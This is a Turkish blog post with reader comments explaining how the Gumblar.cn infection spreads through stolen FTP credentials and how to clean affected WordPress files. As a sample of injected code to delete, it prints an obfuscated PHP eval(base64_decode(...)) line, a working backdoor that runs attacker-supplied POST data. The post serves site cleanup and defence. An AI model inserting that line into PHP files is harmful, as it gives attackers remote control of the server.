«
»

iframe ve base64_decode virüsleri..

Kategori: Bloglamadan Esintiler, İnternet, Bilgisayar vs - 5 Yorum Var 20 Aralık 2009, 19:00

Bu virüslerle bu aralar bir savaş içindeydim ama şükür ki atlattım. Nasıl bulaştığını, nasıl önlem alınacağını ve nasıl temizleneceğini tek tek anlatmak yerine gökhancan’dan direk buraya aktarıyorum. Çünkü anlatacaklarım aynı şeyler.

İlk olarak virüsü tanımlamakla başlıyayım yazıma. Gumblar.cn virüsü iframe virüsü olarak da tanımlanıyor. Bunun nedeni ise web sitenizi oluşturan bazı dosyalarınızın içerisine kendisine ait bir takım kodlar eklemesidir. Virüs öncelik olarak hostinginizi hedef almaktadır. Bunu da kullandığınız FTP programları ile yapmaktadır. Virüsün bulaştığı bilgisayardaki FTP programı ile giriş yaptığınız bir hostun kullanıcı adı ve şifresini kaydederek programlandığı şekilde web sitesinde bulunan dosyalara kodlar ekliyor ya da resim klasörlerine kendi oluşturduğu dosyaları gönderiyor.

WordPress’e bulaşmış olan Gumblar.cn virüsünün tahribatı ise genellikle dosya adında index, function, settings ve config yazan bütün dosyaların (.html, .php) içerisine girerek ilk satıra kendi kodunu yazmasıdır. Bu kod ise php eval kodudur ve içeriği gizlenmiş bir koddur. Bunun yanı sıra wordpress dizininde bulunan bütün images isimli klasörlerin içerisine gifimg.php ya da image.php isimli virüs dosyaları yerleştirmektedir. WordPresste virüs genellikle girmek istediğiniz adresi yazdığınızda karşınıza bir hata ile beliriyor. Aşağıya örnek olabilecek bir hata yazısını ekledim.

Fatal error: Cannot redeclare z96m() (previously declared in /home/…/public_html/wp-config.php(1) : eval()’d code:1) in /home/…/public_html/wp-settings.php(1) : eval()’d code on line 1

GUMBLAR.CN VİRÜSÜNE KARŞI NASIL BİR ÖNLEM ALMALIYIM?

İlk olarak yapmanız gereken web alanınıza bağlanma ekranında (kullanıcı adı ve şifre girilen yerde) bulunan parolamı ve kullanıcı adımı hatırla gibi bir seçeneği kesinlikle seçmeyiniz. Belki sizin için tekrar tekrar kullanıcı adı ve şifre yazmaktan kurtaracaktır bu seçenek fakat siz giriş yapsanız da yapmasanızda makinenizin bir yerlerinde bu seçeneği işaretlediğiniz için kullanıcı adınız ve şifreniz saklanacaktır.

Ücretsiz, adı sanı duyulmamış, seri numarası kırılmış bir FTP programı kullanmayın. Kısacası kullandığınız FTP programlarını iyi tanıyın çünkü bu programlar da casus olabiliyor.

Eğer herhangi bir şekilde Gumblar.cn virüsüne bulaştıysa bilgisayarınız, hemen hostunuzun şifresini değiştirin, web tarayıcılarının önbelleklerini silin, kayıtlı kullanıcı adı ve şifreleri temizleyin.

GUMBLAR.CN İLE BAŞIM BELADA NE YAPACAĞIM?

İlk olarak FTP şifrenizi değiştirmek ile beladan kurtulma adımlarını başlatabilirsiniz. Şifrenizi değiştirdikten sonra wordpressinizin sürümü ile aynı sürümü bilgisayarınıza indirin. Tema ve eklenti klasörlerinizin yedeğini alın ve wp-config.php dosyası hariç wordpress’e ait olan bütün dosyaları hostunuzdan silin. Dosyaların silinmesinin ardından yedeklemiş olduğunuz eklentilerin ve tema klasörlerinin içerisinde bulunan bütün .php, .html ve .js dosyalarını ve wp-config.php dosyasını tek tek bir metin editörü ile açın ve eğer ilk satırdan itibaren eklenen bir kod varsa silin. Buna olarak aşağıdaki kodu gösterebilirim.

<?php eval(base64_decode(’aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29k
ZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7′));?>

Bu kod daha uzun da olabilir ben yalnızca örnek gösterdim.

Dosyalar içerisindeki kodların silinmesinin ardından yine aynı yedeklerin içerisinde bulunan images klasörlerini açın ve içerisinde gördüğünüz bütün gifimg.php ve image.php dosyalarını silin.

İndirmiş olduğunuz wordpress sürümünü hostunuza atın, yedeklediğiniz dosyaları eski yerlerine gönderin.

Bu işlemleri yaptıktan sonra Gumblar.cn virüsünden kurtulmuş olacaksınız.

Anlatım; www.gokhancan.net
Loading ... Loading ...

Yazar: Kasva
E-posta: mertinan@hotmail.com.tr
WebSite'm: http://www.karantinam.com
Tüm Yazılarım: Kasva
Biyografi: Sitenin hem kurucusu hem de editörü. Lise hayatının cilvelerine eşlik eden Mert, 2009 yılından bu yana karantinam.com'da yazılar yazmaktadır.

Etiketler: , , , , , , , ,

Benzer Yazılar:

5 yorum var, yorumlamak istiyorsan;

  • 1 Derin
    Aralık 23, 2009 saat: 23:12

    ah bu iframeler yokmu adamın canını sıkmaya birebir :@

  • 2 Burak
    Şubat 7, 2010 saat: 22:42

    Gerçekten Çok Yararlı Bi Makale Olmuş Emeğinize Sağlık Çok Sağolun Süper İşimi Gördü Sağolun

  • 3 Mert
    Şubat 7, 2010 saat: 22:48

    Yararlı olmasına çok sevindim Burak. Bi aralar benimde başımın belası olmuştu bu virüsler..

  • 4 dogan
    Şubat 10, 2010 saat: 14:08

    arkadaslar herseyı denedım format bılle attırdım pc ye sıtede nevarsa sıldım tekrar kurdum ama herkurdugumda 1 gun sona yıne aynı olayla karsılasıyorum neyapam lazım yardımcı olacak varmı

  • 5 Mert
    Şubat 10, 2010 saat: 15:28

    @Dogan; Öncelikle tüm dosyaları ftp’den bilgisayara çek. Tüm zararlı koldarı temizle. Virüs taramasından geçir dosyaları. Ardından bilgisayarıda virüs taramasından geçirip bi güzel temizle. Ftp programı için Filezilla‘yı öneririm. Kullanırken kullanıcı adı ve şifreyi asla kaydetme. Her seferinde üşenmeden gir. Virüs programı için Kaspersky 2010‘u kullan.
    Filezilla’yı indirmek için tıkla
    Kaspersky için tıkla
    Umarım düzelir. Şimdi derhal hoşçakal :).

Yorum Yaz! Pardon Yazar Mısın? :)

  • Yorum yazmadan önce;
     1. Yorumlarınızı Türkçe'ye uygun yazın.
    2. Geçerli bir e-posta adresi girin.
    3. Gravatar'dan avatar yükleyebilirsiniz.

    •